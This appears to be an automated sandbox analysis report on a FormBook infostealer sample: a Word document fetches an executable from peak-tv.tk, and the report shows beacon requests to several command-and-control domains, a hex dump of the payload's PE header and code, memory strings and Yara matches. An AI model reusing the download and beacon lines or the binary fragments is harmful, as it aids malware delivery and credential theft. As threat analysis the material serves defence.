Source: global traffic | HTTP traffic detected: GET /md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i HTTP/1.1 | Host: www.prestigiousuniforms.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i HTTP/1.1 | Host: www.muzicalbox.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i HTTP/1.1 | Host: www.extraordinarymiracle.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i HTTP/1.1 | Host: www.realstakepool.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View | IP Address: 2.58.149.41
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Jan 2022 17:17:00 GMTServer: ApacheLast-Modified: Tue, 11 Jan 2022 16:19:34 GMTETag: "aca00-5d550d19904c2"Accept-Ranges: bytesContent-Length: 707072Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 9c dd 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 b4 0a 00 00 14 00 00 00 00 00 00 d6 d2 0a 00 00 20 00 00 00 e0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 d2 0a 00 4f 00 00 00 00 e0 0a 00 a8 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc b2 0a 00 00 20 00 00 00 b4 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a8 10 00 00 00 e0 0a 00 00 12 00 00 00 b6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0b 00 00 02 00 00 00 c8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 d2 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 0c f4 01 00 18 bb 02 00 03 00 00 00 cb 02 00 06 24 af 04 00 60 23 06 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 22 00 00 0a 2a 26 00 02 28 23 00 00 0a 00 2a ce 73 24 00 00 0a 80 01 00 00 04 73 25 00 00 0a 80 02 00 00 04 73 26 00 00 0a 80 03 00 00 04 73 27 00 00 0a 80 04 00 00 04 73 28 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 29 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 2e 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2f 00 00 0a 6f 30 00 00 0a 73 31 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00
Source: global traffic | HTTP traffic detected: GET /medicomzx.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: peak-tv.tk | Connection: Keep-Alive
          Source: global traffic HTTP traffic detected:
              HTTP/1.1 403 Forbidden
              Date: Thu, 13 Jan 2022 17:18:34 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Vary: Accept-Encoding
              X-Sorting-Hat-PodId: 179
              X-Sorting-Hat-ShopId: 59690647732
              X-Dc: gcp-europe-west1
              X-Request-ID: e3e3ac4d-8382-4b00-a294-d0a023d81b81
              X-Content-Type-Options: nosniff
              X-Permitted-Cross-Domain-Policies: none
              X-XSS-Protection: 1; mode=block
              X-Download-Options: noopen
              CF-Cache-Status: DYNAMIC
              Server: cloudflare
              CF-RAY: 6cd048db19b64333-FRA
              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
              Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c
              Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
          Source: global traffic HTTP traffic detected:
              HTTP/1.1 403 Forbidden
              Server: openresty
              Date: Thu, 13 Jan 2022 17:18:53 GMT
              Content-Type: text/html
              Content-Length: 275
              ETag: "6192576d-113"
              Via: 1.1 google
              Connection: close
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: http://led24.de/iconset/
          Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: http://p.yusukekamiyamane.com/
          Source: explorer.exe, 00000006.00000000.512405771.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.427812098.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: http://splashyfish.com/icons/
          Source: explorer.exe, 00000006.00000000.441178854.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.513680511.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427688926.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450277744.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.448802217.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450373871.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.513680511.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427688926.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431896377.00000000083F6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.430728798.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441314689.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.448802217.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.512405771.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: http://www.fatcow.com/free-icons/
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: http://www.gnome.org/
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp01l
          Source: explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441178854.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.445007299.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.425426791.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.450277744.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.512214030.00000000002C7000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/cclea
          Source: explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.445007299.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.425426791.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: http://www.small-icons.com/packs/16x16-free-application-icons.htm
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.434207540.000000000031D000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.445067687.000000000031D000.00000004.00000020.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000006.00000000.450373871.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.430728798.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441314689.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514860954.00000000045D6000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: medicomsh78694.exe String found in binary or memory: https://github.com/proviq/lusrmgr
          Source: medicomsh78694.exe String found in binary or memory: https://github.com/proviq/lusrmgr/
          Source: medicomsh78694.exe, 00000004.00000002.423480427.0000000000AD2000.00000020.00020000.sdmp, medicomsh78694.exe, 00000004.00000000.408501370.0000000000AD2000.00000020.00020000.sdmp, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: https://github.com/proviq/lusrmgr/Chttps://github.com/proviq/lusrmgr
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: https://visualpharm.com/must_have_icon_set/
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8CA50CAD-0168-40C5-9DE5-3A2EB92A8144}.tmp
          Source: unknown DNS traffic detected: queries for: peak-tv.tk
          Source: global traffic HTTP traffic detected:
              GET /medicomzx.exe HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: peak-tv.tk
              Connection: Keep-Alive
          Source: global traffic HTTP traffic detected:
              GET /md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i HTTP/1.1
              Host: www.prestigiousuniforms.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic HTTP traffic detected:
              GET /md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i HTTP/1.1
              Host: www.muzicalbox.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic HTTP traffic detected:
              GET /md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i HTTP/1.1
              Host: www.extraordinarymiracle.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic HTTP traffic detected:
              GET /md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i HTTP/1.1
              Host: www.realstakepool.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match File source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match File source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
